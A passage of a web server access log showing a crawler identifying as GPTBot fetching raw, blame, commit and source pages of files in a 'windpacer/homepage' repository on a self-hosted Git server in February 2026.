+https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/html/assets/js/i18n.js" -[17/Feb/2026:13:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" [Client 74.7.227.38] [Length 146688] [Gzip 20.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/assets/images/favicon.ico" -[17/Feb/2026:13:05:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/metadata.json" -[17/Feb/2026:13:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/tsconfig.json" -[17/Feb/2026:13:05:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/tsconfig.json" -[17/Feb/2026:13:05:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 11849] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html" -[17/Feb/2026:13:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/html/metadata.json" -[17/Feb/2026:13:05:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 11265] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html" -[17/Feb/2026:13:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 10120] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" -[17/Feb/2026:13:05:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 10856] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" -[17/Feb/2026:13:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 10341] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" -[17/Feb/2026:13:05:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/html/status.json" -[17/Feb/2026:13:05:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" [Client 74.7.227.38] [Length 41655] [Gzip 13.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/index.html" -[17/Feb/2026:13:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/assets/js/script.js" [Client 74.7.227.38] [Length 16735] [Gzip 8.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/assets/js/script.js" -[17/Feb/2026:13:05:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 11855] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" [Client 74.7.227.38] [Length 10346] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/status.json" -[17/Feb/2026:13:05:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" -[17/Feb/2026:13:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 11184] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" -[17/Feb/2026:13:05:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 10351] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" -[17/Feb/2026:13:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 9870] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" -[17/Feb/2026:13:05:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/html/tsconfig.json" -[17/Feb/2026:13:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/html/metadata.json" -[17/Feb/2026:13:06:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 11269] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html" -[17/Feb/2026:13:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.gitignore" -[17/Feb/2026:13:06:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/nginx.conf" -[17/Feb/2026:13:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json?display=rendered" [Client 74.7.227.38] [Length 10877] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" -[17/Feb/2026:13:06:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" -[17/Feb/2026:13:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 11186] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" -[17/Feb/2026:13:06:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" [Client 74.7.227.38] [Length 542] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/tsconfig.json" -[17/Feb/2026:13:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 11260] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:06:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 11056] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 11666] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:06:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 11846] [Gzip 3.42] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:06:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10878] [Gzip 2.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" -[17/Feb/2026:13:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" -[17/Feb/2026:13:06:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 10354] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" -[17/Feb/2026:13:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" [Client 74.7.227.38] [Length 238] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/63aec54418d3c1735d68bf046c7a9e78a247798d/html/metadata.json" -[17/Feb/2026:13:06:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 74.7.227.38] [Length 14601] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html" -[17/Feb/2026:13:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 34390] [Gzip 9.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html" -[17/Feb/2026:13:06:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 53090] [Gzip 13.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" -[17/Feb/2026:13:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 10351] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" -[17/Feb/2026:13:06:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 11663] [Gzip 5.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" -[17/Feb/2026:13:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 9861] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" -[17/Feb/2026:13:06:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 11178] [Gzip 4.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" -[17/Feb/2026:13:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" [Client 74.7.227.38] [Length 9862] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/tsconfig.json" -[17/Feb/2026:13:06:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/metadata.json" -[17/Feb/2026:13:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" [Client 74.7.227.38] [Length 10950] [Gzip 4.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/package.json" -[17/Feb/2026:13:06:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" [Client 74.7.227.38] [Length 82] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/status.json" -[17/Feb/2026:13:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/types.ts" [Client 74.7.227.38] [Length 11482] [Gzip 3.27] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/components" [Client 74.7.227.38] [Length 10573] [Gzip 3.22] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/services" [Client 74.7.227.38] [Length 9917] [Gzip 2.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" [Client 74.7.227.38] [Length 10838] [Gzip 4.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/index.html" -[17/Feb/2026:13:06:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/pages" [Client 74.7.227.38] [Length 9972] [Gzip 2.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" [Client 74.7.227.38] [Length 10269] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/vite.config.ts" [Client 74.7.227.38] [Length 11889] [Gzip 3.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/.gitignore" [Client 74.7.227.38] [Length 11455] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/index.tsx" [Client 74.7.227.38] [Length 11608] [Gzip 3.20] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html" -[17/Feb/2026:13:06:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/html/tsconfig.json" [Client 74.7.227.38] [Length 11849] [Gzip 3.42] [Sent-to 192.168.0.250] 